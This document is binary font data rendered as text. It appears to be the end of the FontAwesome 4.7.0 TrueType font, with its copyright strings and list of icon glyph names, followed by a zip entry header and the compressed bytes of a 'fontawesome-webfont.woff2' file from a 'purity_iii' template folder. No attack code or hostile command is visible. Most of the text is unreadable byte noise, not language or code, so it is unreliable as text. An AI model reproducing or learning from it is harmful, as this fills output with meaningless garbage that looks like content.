о�QQ��о�QQ���cQ����ǡ-�җe)U�s2����XD\���ϼ�Yd����/?O_o���#"=#"=4;543#"=#"=4;543#"=#"=4;543#"=#"=4;543#"=#"=4;543%#!"&5463!2++532325++532325++532325++532325++53232�p00pp00pp00pp00pp00�8(��(88(@(80pp00pp00pp00pp00pp0� � � � � ��@(88(�(88� �� �� �� �� �/�Q�/&'%&/"&=.6?&?&'&6?'.>-#".6?'.>'&6'.>54627>%>76#"'%
%6��

2�7
2G
f���!)p&4&p)!��f
G2
7�2

��	*6���	"��
4�7
2G
f�!)p&4&p)!�f
G2
7�2

��"	���6*	�!k
3

j�&3
%,����*��&&ր*�9���%
3&�j

3
k!./!>��>$,*!k
3.j�&3
%�Ԝ9�*��&&ր*�ǜ,%
3&�j

3
k!*,$>��>!/.�&6.'&$	&76$76$�P��utۥiP��u��G��xy
��Զ�[xy
�-���_v١eN��uv١e	��=��u�ʦ�����[t7��8�X�
&6##'7-'%'&$  $6 $&6$ ��3��1�N��E0�����g��R�=|�����||�">"��������LlL����^��v!1f2i��Ђwg�fZQ�Q^>"�||�����||�w������LlL��&�Z�Xblw��������.'&>'&'&".'.'&&'&'&7>767>67>7626&'&>&'&>'.7>.676'&'&'&'.67.>7>6&'&676&'&676.676&'&>&'&676'.>6/4-LJg-$	6)j2%+QF)�b3FSP21DK2�AW")")�$??8A&A�E5lZm��=g�G2Sw*&>$5jD ���GH�yX/4F �r	1
	1�"�"!�l=6>��	6
,5./��'e



.*�|�Ed!
u&�&%&��	&��5d	
���))66@�C&8B@q��L?P^7	G-hI[q��:<�rS	U~97A_�IR`gp1	1	�;"("j?>"�T�6
,6 
&/`���LwQ'�	
��A	^	�	�	"�		$&	_	��	y		�	*�	<Copyright Dave Gandy 2016. All rights reserved.Copyright Dave Gandy 2016. All rights reserved.FontAwesomeFontAwesomeRegularRegularFONTLAB:OTFEXPORTFONTLAB:OTFEXPORTFontAwesomeFontAwesomeVersion 4.7.0 2016Version 4.7.0 2016FontAwesomeFontAwesomePlease refer to the Copyright section for the font trademark attribution notices.Please refer to the Copyright section for the font trademark attribution notices.Fort AwesomeFort AwesomeDave GandyDave Gandyhttp://fontawesome.iohttp://fontawesome.iohttp://fontawesome.io/license/http://fontawesome.io/license/����������	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ab�
cdefghijklmnopqrstuvwxyz{|}~��������������������������������������������������������������������������������������������������������������������������������"	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRS�TUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~��������������������������������������������������������������������������������������������������������������������������������	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~���������������������������������������������������glassmusicsearchenvelopeheartstar
star_emptyuserfilmth_largethth_listokremovezoom_inzoom_outoffsignalcogtrashhomefile_alttimeroaddownload_altdownloaduploadinboxplay_circlerepeatrefreshlist_altlockflag
headphones
volume_offvolume_down	volume_upqrcodebarcodetagtagsbookbookmarkprintcamerafontbolditalictext_height
text_width
align_leftalign_centeralign_right
align_justifylistindent_leftindent_rightfacetime_videopicturepencil
map_markeradjusttinteditsharecheckmove
step_backward
fast_backwardbackwardplaypausestopforwardfast_forwardstep_forwardejectchevron_left
chevron_right	plus_sign
minus_signremove_signok_sign
question_sign	info_sign
screenshot
remove_circle	ok_circle
ban_circle
arrow_leftarrow_rightarrow_up
arrow_down	share_altresize_fullresize_smallexclamation_signgiftleaffireeye_open	eye_closewarning_signplanecalendarrandomcommentmagnet
chevron_upchevron_downretweet
shopping_cartfolder_closefolder_openresize_verticalresize_horizontal	bar_charttwitter_sign
facebook_signcamera_retrokeycogscomments
thumbs_up_altthumbs_down_alt	star_halfheart_emptysignout
linkedin_signpushpin
external_linksignintrophygithub_sign
upload_altlemonphonecheck_emptybookmark_empty
phone_signtwitterfacebookgithubunlockcredit_cardrsshddbullhornbellcertificate
hand_right	hand_lefthand_up	hand_downcircle_arrow_leftcircle_arrow_rightcircle_arrow_upcircle_arrow_downglobewrenchtasksfilter	briefcase
fullscreengrouplinkcloudbeakercutcopy
paper_clipsave
sign_blankreorderulol
strikethrough	underlinetablemagictruck	pinterestpinterest_signgoogle_plus_signgoogle_plusmoney
caret_downcaret_up
caret_leftcaret_rightcolumnssort	sort_downsort_upenvelope_altlinkedinundolegal	dashboardcomment_altcomments_altboltsitemapumbrellapaste
light_bulbexchangecloud_downloadcloud_uploaduser_mdstethoscopesuitcasebell_altcoffeefood
file_text_altbuildinghospital	ambulancemedkitfighter_jetbeerh_signf0fedouble_angle_leftdouble_angle_rightdouble_angle_updouble_angle_down
angle_leftangle_rightangle_up
angle_downdesktoplaptoptabletmobile_phonecircle_blank
quote_leftquote_rightspinnercirclereply
github_altfolder_close_altfolder_open_alt
expand_altcollapse_altsmilefrownmehgamepadkeyboardflag_altflag_checkeredterminalcode	reply_allstar_half_emptylocation_arrowcrop	code_forkunlink_279exclamationsuperscript	subscript_283puzzle_piece
microphonemicrophone_offshieldcalendar_emptyfire_extinguisherrocketmaxcdnchevron_sign_leftchevron_sign_rightchevron_sign_upchevron_sign_downhtml5css3anchor
unlock_altbullseyeellipsis_horizontalellipsis_vertical_303	play_signticketminus_sign_altcheck_minuslevel_up
level_down
check_sign	edit_sign_312
share_signcompasscollapsecollapse_top_317eurgbpusdinrjpyrubkrwbtcfile	file_textsort_by_alphabet_329sort_by_attributessort_by_attributes_alt
sort_by_ordersort_by_order_alt_334_335youtube_signyoutubexing	xing_signyoutube_playdropbox
stackexchange	instagramflickradnf171bitbucket_signtumblrtumblr_signlong_arrow_down
long_arrow_uplong_arrow_leftlong_arrow_rightwindowsandroidlinuxdribbleskype
foursquaretrellofemalemalegittipsun_366archivebugvkweiborenren_372stack_exchange_374arrow_circle_alt_left_376dot_circle_alt_378vimeo_square_380
plus_square_o_382_383_384_385_386_387_388_389uniF1A0f1a1_392_393f1a4_395_396_397_398_399_400f1ab_402_403_404uniF1B1_406_407_408_409_410_411_412_413_414_415_416_417_418_419uniF1C0uniF1C1_422_423_424_425_426_427_428_429_430_431_432_433_434uniF1D0uniF1D1uniF1D2_438_439uniF1D5uniF1D6uniF1D7_443_444_445_446_447_448_449uniF1E0_451_452_453_454_455_456_457_458_459_460_461_462_463_464uniF1F0_466_467f1f3_469_470_471_472_473_474_475_476f1fc_478_479_480_481_482_483_484_485_486_487_488_489_490_491_492_493_494f210_496f212_498_499_500_501_502_503_504_505_506_507_508_509venus_511_512_513_514_515_516_517_518_519_520_521_522_523_524_525_526_527_528_529_530_531_532_533_534_535_536_537_538_539_540_541_542_543_544_545_546_547_548_549_550_551_552_553_554_555_556_557_558_559_560_561_562_563_564_565_566_567_568_569f260f261_572f263_574_575_576_577_578_579_580_581_582_583_584_585_586_587_588_589_590_591_592_593_594_595_596_597_598f27euniF280uniF281_602_603_604uniF285uniF286_607_608_609_610_611_612_613_614_615_616_617_618_619_620_621_622_623_624_625_626_627_628_629uniF2A0uniF2A1uniF2A2uniF2A3uniF2A4uniF2A5uniF2A6uniF2A7uniF2A8uniF2A9uniF2AAuniF2ABuniF2ACuniF2ADuniF2AEuniF2B0uniF2B1uniF2B2uniF2B3uniF2B4uniF2B5uniF2B6uniF2B7uniF2B8uniF2B9uniF2BAuniF2BBuniF2BCuniF2BDuniF2BEuniF2C0uniF2C1uniF2C2uniF2C3uniF2C4uniF2C5uniF2C6uniF2C7uniF2C8uniF2C9uniF2CAuniF2CBuniF2CCuniF2CDuniF2CEuniF2D0uniF2D1uniF2D2uniF2D3uniF2D4uniF2D5uniF2D6uniF2D7uniF2D8uniF2D9uniF2DAuniF2DBuniF2DCuniF2DDuniF2DEuniF2E0uniF2E1uniF2E2uniF2E3uniF2E4uniF2E5uniF2E6uniF2E7_698uniF2E9uniF2EAuniF2EBuniF2ECuniF2EDuniF2EE����=���O<0�1h�PKԜ�\��Uh-h-=purity_iii/fonts/font-awesome/fonts/fontawesome-webfont.woff2nu&1i�wOF2-h
��-�?FFTM `�r
��(��X6$�p� ��u[R	rGa���*�
�'�=�:�&��=r�*
��]t�E�n�������1F��@���|��f�m�`�$ؑ�@d[BQ$([U<+(��@P�5�`���>�P;�(��1��l�hԨ��)��Yy��Ji�����|%ہ�^�G��3�n���ڕ�
�͐D��p\Yr �L�P���t�)����6R�^"SL~�YR�CXR	�4���F�y\[��7n��|s໌q�M��%K�.ۺ,����L�t�'���M,c��+b��ׇ�O�s�^�$���z.�mŠ�h&gb���v���'�6�:����s�m�b�1بm0"ǂ��*V����c�$,0ATPT�1��<�;���`�'�H?�sΩ:�ND����I�$�T�[��b4�����,�μ�」bl6��IL�i}ی&�4�m,'���#�ץ�Rw�bu��,K����v��m_-���\H����HH������?���m�9P���)9�J��$ƽ����8������~�;�r�n�=$��Nddn!'����;��8��'�N��!-Jʶ�.����X�=,��"`:��		 {�����K!'��-FH��	�#$~�Z_����N5VU8Fȯ��%P�ݫ���Cp$Q�����r��ʽ��k�k��3ٷ�:R%��2{�ީ��h%�)8����
ILK�6v�#��,;Ц6��N�2�hv�����OO��t#��xT��Bf���q^#����?{�5b�I��%-WZ��b�A�^�1��n5���צNQ�Y'�������S��!t" `b3�%���35��fv;����lά�9�:jgf?gr��p�x� �|� $ e��Z(�$w(ZrS��v+�Z���q�M������ݙm?&s[��t�S�Sj��9���?�|��
���>G�,bDշ^��^���:l�3��NA�`�5�26�L�pS�	Aߧ/U�
�֘����'9\��Նt���!������l� PMR���9n�
�`(�@� Hy)M�dM�
�5�ԤH'ґ��mS<���q&k�)\�{;�1��m��8�{��X�1�-3ǚ��)�B(��,�%���������w�o~��t��HW8l��Z	r��=e���1+�/Ɏ1W?ְr�89PL��>uo9 �1 tØ��uc�����@��]KR�bN���v������(�"��y뽻{c�����scz�&�p5���,j�n �kN�!�.�n^��Uu@|�?v�>�����rUa�HR ����Ց��I
D��ˋQ��~p�
�܍;;�n���L$�t�	:	hFCY���TO�FNN~}�1"`�����a��(�?H ����\���u�0LԵ��'���͔PbnmO������Jl�?��s���0,8�x�B�B��F��_�RiZ����~e#j��w�hOc*&F6�Yq��{�}?��>�u��.�4�h%g�`�&�� ��)��R5�H�}���ˤ�kܩ��'J��O�I����_��qOb'�HǟBYEM�6�v��5�NJ
�O�NFNx(1�:\�߫C�k�c�b8Q�	d�[L(el+2u-��a֘d��5;�N$�"�H���SF�o�2i�"��\�h7I���<SCO���ȐH��Ew!.��!BSC�gĝ�c���s*էs�(5m�=q�ʊe���Y�$�\>fN8�q��x�#v
�6um�	���`�NM-J\�F��r�D��Z�0�#'ꥈn��GjL�چXʌ�A���gYs�*�Y���^ٵ�;"�$hb=�ϛ�0�vH<�Vv�c�_\Y���w;dB��N��3!$������I|P� ~&�d�.�԰�-a�a	++��9�.mR��4�cy���#�U��FW�u�
�	i/𜯔f~�4��l��XS�9Ä�1E��3@���k��@'#���c���n� ���S_;�%��I��+��.�L�Cx�����ꆱw	��Vۂ������Exf~H`��0�!d��@Q{Oh1��H��Fë�zs�7�݉��Ɯtrv���k���heS3�ۇv�9�q|�O��K)�U\�A�%����o{l<��K����͎���i���H�G�I�z�=6�WWo0��|�%A�jdD)!
��pw���_���;���c�D#�ˁM���Nz���p�^�CDx��xj)�5O�9�
�`��EDX�x� ݒGU��˯ę����ډ�.%
���Έ�~��=�Co�)
F�7���$Z��(�g��oB��
�Ɯ�@��&���e�{��厣�l��f�_�Rx�N[�]��8`-3�s����{Pj��Wuc9���[>�-�.D�܎Y����d������+^{���C��m����,��@N<������.��V��M��S�+�\D�+��R�|�6��'q\T�����9�D�X<$�p���"�酦��$�ҷ�,�p�s��T����b���NkI�_�`��
F��W��V��%��w�~���DԐ����*�xi��y[rZ���[S%�G��s`F<ㅣ��� ��V�+��!+������؍�9y�k�fb�82�s�}l;[)e$��T���k����)�v���9����{�u�u�t��޳@E��>|C��<\4%�Rv���������@׺C�8\��~)#k|��.a�o����00G�q0%����hp���
L���"�+>���%�^Mˊ�N�s��q��=�����䦆�K4r�-*��%��h#�%;pP馔h�C=����
��&)�ba��KL�@����t�!�~2�S]rYl�Z6�3ўJ�o��O�V�;�h&gO5�RT�/}����{���AZ�&�S���t����ͯ�P��C���0��D,�pbpз�z)� ]�I�>Q\Bl�"��^3R>r�*��C>����xPU�z�}Y=�̕�}�ж��
�
6-`/"H
o�&�D�I0�E2Xa��-�{5���<
,}��``6����ji���im<UujY�Z�jB\@�g�3Ejfp����:����W�Ǯ���߳����p�ij3ao���1�da�� ��ݫ����J�ײ? j�q7��M���ff�Y�f��s�$��	��H���l��������(%.�r��w?�m=~�y�cY�bg)<�W� /Vx�k���$��B�r~����9�6�0�&��_vMY�%��ҝ{�E�6<������%�%�4���ߠO�@��N����"Z��OD{u3S��W�M��R��3s<���س
����\I0��.��-2ݭ��ㄭ;�	�0��}N�/b���N{�I��|b_r�e��_pSi���>'�w�5��RF,ч�%SY����Wh�6L_i샣=���i1�3�YI7N�Cp�I��Ĕ��(�r���0��{j����r�K����Тo)l���3na�T1\��IE(�m����߃���D�l��e����$Å�wX���U��(@����M�a"n�,�*vG���̨x���>�G�S����g�̉"�Q�v�b0*z��PE�y�ɉ�?7�$����%��G����p�dY�&f�!��a6��|�)�;u7#�3�4�mJij�
o���O�p�ȁ�v8j��x(K�/Z�d���x�Ń�m7V�_\�f�L�7p�X�z�H7�-���,(1KHb�e��,r-��p�L����3=�T��2�t�2ټX�k:����Z�5��s�p��SsT����:.]��D"�@��-�E�̑!�A��2�ɶ-�F}�˒�2Bǃ��Q���)t�ç|�#4�|�\�㨀��`�fc,��#�g��1:�-����ty �]�����2�Z~��.)�����nj�����%R�K����(y�`�8��C��֍���z���K-N����`^+����n���3��ϴ����T��3�tQ�أ�4<>:J0È%�ݑZab`��vͬ��a�T/Z��aޝ�ГIi	�W1���_��>)���H"�����p���|7mF�^Z��~f�0J��^�I��3V�!���{�<e�/=�p`���q��8^����K8��O�9�w0��Z��|��v?�n�	�3��f�!��߷�~��T� ������ Jӛ����5��p���V	��3�˫����.=����-}��[�g�R�5���n�B8���3.��8	Yg�#0�&���S�/.fg\
E�f�}��,k����g��$�?XY�*������1��p��E(����RS��Q��t��6,�Q�j\��</]N�s���;�'HX]�E�29��d�kY�
�j���R6���Q!���� V���
%"^�`�N3O�����[�v:�ʄ:��^ڜr׿�@���
�F�_���Nc�B���8p�\i����7��g�*���,�C����[�6�T�?����%�z��@jApBN5�"4T����"�}0uJ􇏞�Ȝ~3���{}uW����M�j�9�-�]����'lS� /�R><�+�O����eB#�Bc���jL\��-�Zh�[�I<����q�v�~�k]�G���TD�?S����/�-��%ݒ����7��w�i|C�I��q�wc��W�x�� �/7�x��HO/���o]���G]�y�߃��#��7��b��$�t��R�$ ���]�a7�F�Ѯ���,n!r��I|2���8�x�6�gS�h�	��R^^�D.�x�M�MS?漞'G�#�~�+�����v4�d!FyT�9�-�fVa7h�B��4�����,�2�Ɖ�&vTHMqp�4?R\�����Xa<��4�@Mi�H�D_��	�Eg��R�y�M���lT�ؠJݮ
��yc��"�HJ�, 6�u�/ڴ��������y��V���nJn۟H\P�R�Bd|�4�_�$k����.��w��™I�pS��$��|}j���9������m�|�1�ߘ����n�93�9���5qS�|���xW�9�����B��VZ!����m�K/�Ln;i��u��$�*�t3�Ͷ��@}���B{�Y���ԑ�z�2J�u@�a�\M���R7o��dz����e��7�/$4]^���2k�h$�=%��1�I�B�؃ ��H|�N.[�M\L���b����1Mg��:�NV._0�,�+�,��h�t7�l8�s~IV^
N�˼M���ؑj��ك-�	oܮůQ�o[m��j�=r��m>�~z4$M��}z �s�h""���u7�V{Rûݦ�O-��D9V�٥g�IʎK�Lg۶B�T��P�'�K��̦�
qW�֒�3e����p�&���ے��L�hp����N�aS��w��
&���;e(�,-7v�x�-��w$W��nX�U��������t8�����Y���?KM�ct�Y؃�p*Շ�����-���БfL�|�[nL��
}4�{5�頠�3᧌�n���$$,+�DNԄ-H�V>��H����Os\���-�;�W6N��M��8��Fi���;���7k�2�6%֒�a],:!�ʲڽE,��{U��naw����Ng��.��I9r:j������<IE�1�`$`Lbrǒ��ם��]�x�9=Rv&*Q5�0z��y<���`M|�ԙ�dO�٥iZ���$���+#KH�F
��������	������)-	�:M$�yc��E�%Ai��2]���l嶨����8�I�y��ZGJ����\�2֙Xb�L���I�A-�GrR!�0���L+�Qh�S�Y����S�5�_�(�poF��T���#kN۾�l|r�n�d�H���yۊ����&ۆx�p�����[�8G���dt�����z찃٦	8��B��KP"@2e�e��y�x��j����JKˆh�XŬB�}��6�â��`?�i�*�[9e+b�VL�aL͙����dBYp.�ψ
�n\4�糅Ƥ���d�<w��W"��? �'�O%�a2N�9��,�ߟ���!���.�y�Z��%�4�U�^��u�φ�g�)M%��C��V����M!z�&�����|D�,�i�~R,%��|O"�����h\3+��a����������i8��\$!1�L��a6s�
z+M�R�b��_
k�v�j���U��裒-��jX�Gt������b�~�˚��ꖺwt���͝�SkP�2���(=cvt�"�[3��&��h�DN�=�򈎋Pɛ�A�G���'_�R#��M:.���3�	���tJ~��3zwx ���;�7��O�8��Y)
�DSE����/����7�i��!wy�6��$��8E0�Taތ�|@�
g����.;m���9�9�s�HrL7&�����3Bs�|[o&ou�Sg�խ�+{�AE���kZ�	�"N�d�5��:��IV��ڊ�>�F�b�K��Ψf)*c��G5<��C����.g�]��k��
��� A0�-��٣��v�T �d4K(��Yq`���(u��{,�:0*$|2����/I��,�`E�����xP��#q�����`��/�:�����';�ىV�D)˴�r��89�w�}[��F����ޜη���+��šh�KH�\�ǚU���䬂J�V$pUj�|c0���{���L��A��?�V�=�4���S�Ŵt`���d���o��d�bUP���J�x�g��JR�r�O���s	�����4Mw���
�""�42����`M��D�/N!��v�3չ���.�f+�@xO�V�q�j^�Cߪ�Km���,�8H9�Z��<&�o��(�@��k����M5����]�M��U2=vpB6DXj`�r��<�w��1�Y�:� �o�<�9�;����F���$;2֜�j���޺�x,�ʁ�C�Rĉt��$�VJf�f��9�)�a�9P��&���6Oo��l�<������ds=#3�s��P-�bD��"��[:�wɺ^j��Ӂ��Qej`���Tq�=����H&�o��kĉLD�W�O������*J3s[�6�j1�@��nr<�ξۇ�#���@	�0��c	���?ﵝ<2�D�Ӧ	��}��Ts��S��"�R�
���.}�oZ���Fo*���ݗ������:�������7��H��䍚�x��]���a6v5�R��̾e1��$XL����
J�aa�݆,��섐�"3-�G�!˥8���8
|�T:S�P������pMR�Y�b��{�+�O�eۛ2���g���u��V=�U>-�kb6U���ЩpZ�M��O�`���$W�D�y���A߻�[�4��a��J?�fD?=�d��(KD䴱:�D�/[�#��$A�#KH.:��x?%��V�r�@[B$�}�c�o��S6`LPfM&ɔ��A<:��v��Ú
Q�~P�w���[��+�������`+j� V��+��R*���u�l!���|�+'�KY�6�6��_�ud�}_���[�yuۘ�j����o$��Y=�yjR�i)��b�ԋLaD(�X�U�wI�ڻZ�$�7ڻ�9��&��4Z���'��DF���[N]�~�dD?V�Q�W��Ͳ�}vS>�Nm���+S�q�H��a���U!�Β����Wb_+�����U�O]�^���l59	@��1�'���A�^��m����o�:��9�ף�s�-�N:���tD-�zkS��j�a4�rc�zF�ۻ ޿�x��v��7[�äC8�#7�p5�+��� �~*�bJJY�zֳw+�����-��p�/L�L[cg���n�lc��a�P����H�F����$}�9`������\
��83�Ym�1b>�~ƽJ��؂�Ϗ�yBs="�����f�(zK��M�"�H`��w�c�Ed��:b8�6(9��<��c�l�ݘ/���k��g�G���������^ESE)5�G�_^��k߇�v���̚�}T3�;6� WvTCP_���k���._e��єNJ�L{T�!��6�j>h��0��#���[��㗚����K��z�,�!�3���2����:6d>�himE�\�=�H��Z+{6��@W�ʯ&lC'�,��rX !8�(\�̭2�-�P8h��@�C4��<~����Z7j%)e����eF�pZ�'15��^6B���3�nc�o#~���²q��R�@!ա�� z�^�Ks]T�@�TN�T �,S*@7��C���ī�Ʌ����L��iQ�N�,��	#:��RѪ���j��9��1�-�Y��P�N¿�\&�yL8�ӹ��&0�c��v�Ɖ\�����J�A��;��Q;�]���I�M8	�s���Mf�?԰�I��r�r!�K�9я8p�}Q�콍��g�-�*sm�~�X�P0d�M^��?D�dI�m<��p;�y�,"ۦ�6��v�pT\^�n���3m�>8�eC���N}����cà�٭$s7ۼ��#յ<SF-A����z��≱�
�B�	*{�6cg���Tz�GX2+�����a��0����;� �EEaG�d�Θ׿�[�M���
�i���g��:B�[�	U���3�J9�
0��I�2'	o����\e�%4^5}����5��� �0=�
��J�}m�y�&����"��.cւ	V��}e�J���:42q`G�O�-���-B���J�F��Y�۾�3|��|)��������IG��a����+�*��ttPb��A�Do?C��g�t��;��I�]G��2RE<^�mK3����+��;�
�[���3���[1����y�v���
#��p�<j�iC�af�~\�G�C�4���dubt B�K��бQm�=�a���Tq<��^z�ء�(�޹�G~QۼZoO��c��r>R�{b��4���vM�q���l)<�V�{ě晐�2P��T�'D�
Vt�������oP�aU���6`���"�Qe�]ka-�^<xj�<�G.���~��������5۹�ۯ]�V��`8Ϧ����%���r�y�v����;��pc���������`�٘�uҙ��9q��q�E���ҹ���B�����6�Ǒa�e��E�ثO�Y���Ǒ#:y�p���/!/��5s���U'! ��"|���B㡪�
�t\�T#���ҝM�$+2n_��� ���b���^�&��������e��i��c�I�=��u%E���ȭ�֓
���fj�aظ֐����E�ӝ��_�e���(r}�mo9��UP6zH$g�4�ٺ6�P�@@�X
(1�Θ��x_	Jy�{�3���',����M�1n���>v�O��ճ����j���ְr�1�f4cs�_%v%l��K�ZNi�+V��3�'�����~��N�M�G@H��B�b+���v�VFq@�ݱuKZ�h�p@��E0�����ua����SXd��U���K}ԯ�8G�X�KiI���%���uR)�E��I-�ږ8��|1��G�Ξ��f6�Ȁ�=!K�F6�Qf[X���~��_��j�\^�͋^k����`����D��s�G]~�㤛yo�}��;+i%�N}�Q��0��ԥ�U��u)M��[�Z`"�7
��?/[C�{�l�)�$Mr����|^��	a�����:���"�֊��a	�l�>�h��y��a��{�2>��CP����L� �j?�ntg���]��S����{�UӇ�('��b�'f��g0Ӄ����LPA�Mtd�)�2ú�Y!�v�&`o���2P[�aޔ��5��S�|#+��7J��
#ȸ�_��dU��6#VD����B"K���|�����)o���tk�l���,��l���U�)ݹe�5�<A��\0��_�7���^~{�$
qR�ΰf���P
a!f���XU���hX�l۽^��:(�m�?��@=bhg��O͖{-�i�:�'�A�8?g��zHFz0�[D#�A�.��%'��w�=23�ɸ��Z'�Hx�����&I��4�1I�Ji����e�z����͏��o�ٴ��{�����i�ß8	0[�K�/�n*�a5���ᰉ�,c������+��A��BDrlDo���"$Th�T����9�$�岣�'���0V�'|�"������
���S�AJ!�Տߑ�6�F6R\�6\��9�-�_=��Q�"9IW.\.zmkz�F͵U�x<9��ɑ�$�7i�FS����ʧb߂@�ۨ�}��u��o���Ͼ��Ѫj�4=���oeUK�xd�W�뻸1nD�X���y�"���5倘�ʂ����K�����-�o7B"��ě)��uW��E�h9��b)P�%.�$�G��(@(��u��R��fLT ϪJ6
���)H*y����=���Q/����uI.��<���,��r#�y|�l�<`��Q��=���F$��A�t阍2��d6c��Wǥ䇣4~�%�vb�a�Е_Cծ�Y�l�̨�vq��s$m:�G���\�W[����C	�l��}�R�^�2J�I6�X�l9��=��`t�ӑ�/���P��jes"��_�
L��w�m��~��X���N�M�1x���ٛ#��NmzS�%b��,���Ž�~�B��	`�9�Vu6U�}ֺG��u�n�wO�����fsC�\������g�������V��Φ��@����:�_`c+}�L�<�[��#U��*|�歺[��[姙�ԧo��ɼ��\=GR�K,![<��H�?��;�9���:��Iͣ+��a���!���*��?#�'G��=���Q6�,�g�m&;���������X故0��
�������;qW�q�'�4��I�C�g���΃Y�`�~`6ix0OG�g`���[~��?NC�Q@�Ȅ6�N΁���A}j��Ba�3�ť)���˴:q�I���gZ�2�vlf,�У��Y��Ѯ��bԩ����Xo�Iė˜�X���_'���5��]J���2P�92��C͉���@�C�����6E�e�B@���A�9�߇���Ǵ�y]�H�	�-� �b��9
��O�0uw��I���7J�x�ū2��\�Vf=nV�V����"#9���v8x
��mpAh���y�3��pQ	%��t^��� |�‚]�YB8jC׬n�#&�ɇ��ʴv�˒P�>�O�������y�UAt2�_�������n53e*��1���v����(K_H�vV�ʉ3},��A�C�Uƍ؂�Cu���t��i�-]�`�����7�]R�
!zs�N��t���&��̉̄k)��SL����̹�y7��$��ϥDJ�N�d��"��9�
�31 I��Z(^(
lw6
/�@�Y�B�^���}�OT~9c�c��]���{�)��}�D8�${����yc�,ʤ�{�tA�W3zHI��m��D�4ܤU��T3d�I���D�)
��I۬�.d�~�[-�K�^2�Zc��
�8��u�,Y�^\�_��ԁ�_�+�cJ��$�\2:ZW��b�B��w=��[1'N�YVz4�;��(�fzN���U��f(p֙�!x�#����L�=#ŋT�hn�b��a˳"��,�T�\o�!��@@sN%��|
���t��Xj�	j��	�Qo5��������o�eF)o�� �9˷�:�h*'cJ�孏��[��{ȄNf�nz�]8F�/�|��1�v��g@�J:�Y��նNu�:�d��hH���o
����t�M��`��R̍�R�i�:|N�_P"����B@���� m`a����:M���	c2�Ũ<���ؓ��U�O�S�\��%a\A�p���ꄯ�e�\��A�����.̰{���w�ǿ~<dXIh��RN�gkv��o�{n�Ԝ�}���H|e�iV�W����?��#�(K:��m`�&�L�x^F��+'�����؜Z慉��ŏ1?^�E�(�ݝ�D��u��6��T˜��LS��6O�am��d�ʙy�2���|�^�S�K�}*�2L/Ř)�h~����\1�� 
D�̅���$��1�G/Εo��0^����_|q,��|��`�ܷ*z�|���'�usv�j(q�R��zL>��6������	�;s2�ŋ`���W�`�TyP�g�ee0����00�}/ǔ��;h[tG�D�5�^E��#�h�ȍ:f?	�u3z0�ڎ�$�T���^T�Ahz�	�x
�I{��5�������'�r��K
��z�o l֢<���Nl���f��M*�~�Uʏ�W��_�?�v;(A���ͺ�R�^� 3�=6�6=2�n�~}c���O7�X���d��J�|��LP�ޝ~ͅ���8�+QD���\���ҭíS�\�=�U�v�
M䅚c"a��K;�A�=ԨĚ����k�J�N�p��M%AR`�و;�(���5�W���=���Y �g-�^v4��X�ى��J�@��=�c�3���}�*)u���b�T�F�'�|�N3����E����9��ڪ)1��!G���k8��6�D�
~H���Gp�%�Fz3�2��M�J�aZ��?�c��n0�)?�h�N��u�����m3H�~����1rD�'����1������Kr�t�sJ�Js������ָU�����2��r^�+hNzg��l0'\/e��tXԐ�v�l �j�cm}!Q�ϼ��t#��z��#]����ϕ��O��ׇjE�:�#	�6�n:<�N���u�i�����{�z���1ʞ����UV��l�+�a�N��W���h��)O�2ymEl٤�A��7���YQp���fB��<8����;����'gKR5n�����T@	�n�*��!=a5��������Z~CW��P^DX-Xf�j�N�ű�q4�O�I@��S����}�Xh/�>�,b����89����-:G|W��)��b��A��5G��<*ٕ��:ğ�!]gj~�O�&��U�N뢹8�� ����g�]-WW(W�NI�3��N��gr�3|��m
�m��'=[n�힬M,?�$��HD��D�-��O?5uX�]˓��3�7�>�*�w�g?���*!��JyT�@U�g��z��I��_��7�&�\t��H.Y�Z�(4Y'�d��T�
�F��s�-�qy�a�7�
[��67K&�J�/$�c/��x���[���ᶏ;�Ī�z1Fv��]G�'ڏ�Q�BSO�������І$�y�(��TS��-;�hűz��T��%D��ts��"��=�gwU�uD?b�$Zr�9�G���<��&�Ña<�v5��0�]f%S��an*���؊���oмb���8pJ9����⠚�'�-s�@�r��넅��T���AX��I�\8m]{�Of�`#��X�T^f�5��''������W�2Ϸ v�sE�\��Qs��(�ː@A�jR*Z���a��̳�Slі�R�[�ܜd�*)�ɩ���P�¢ĽHt�o��5��8��.��]�h�\s�І؋����?�Vs���h-U�'�#E�g�m]��2NjWl�rm�Z������#2�BE75^^��a4��wU��K�'g?ge���213����Ǹ�o`��lKzP6^� �$�$9N���Wvg2�HϏ���CR�ߜa7F�/��3�\8���F�\�/zP��/?������{x��Ӽ�]�������/�^9�@7c�ޥG<Ho~�F��!�6�:�j�*��Nb�lNy����C�cG��d2[d7�W4]�
�5�4i�2���*��h��p�*�9���mYmط��kh"ɋŊ�W�!��A�an��J�|�V�N�c|�u���j+�'���7������('tcnV��d�Uc���)�I╵��8()�K�Ζ9�U'���պ�j��?Vפ@B�O�E�G
,�cC�"Q[b�$�9td҆�=��X� �dL���M���͋��h��~���l�c�.��ж�t�q�?Y'{'ވ�A�cS�V�M�%�kD�
�{Ʀ�X�=�:��*|�ͼe"������~��Ov	;�G_RϞ��\���G�$4<��ie�f3���Ph�H��b0��6ĎU����s����LӨ���Q�|_P�����3�0����D���C��H���,A1^'�M4������]%�EJ53�蕂
+ͪBP�^$R��R
DB+�M-�	�s��b�R�VFeP�;7����I��o��m��^��M����k��++_�����[9K����W��R�vۧ�?f�q2�s��}�X�@y�f��������H�/=�����֯�A~ ��0�̜�xra� GD�v�l�Q���Z\\�D,h�i�J�]&(A/�"Fb��a�ƚ�
��m2�l]��x$��E5x�Ð1x��{�����A�1>^2���_���Be�;b��~�փ)�Ό2�j��� �r�8]'�7��
���� b�C�h�T��d���)�+���mD)���.5�1�-���|Yy���*��o�ڤ�L ���4A她=
��T���@|�X$�in.K�I|�R���@�P����@���P��*���a����k@�۟�������=I��	�=�l����[���ג"�h�X0�QҜf��˒��펖�c�<#9`|cO}$o>e�X<�`,�o���_��K�3�����p�{Y����An[�9�M�
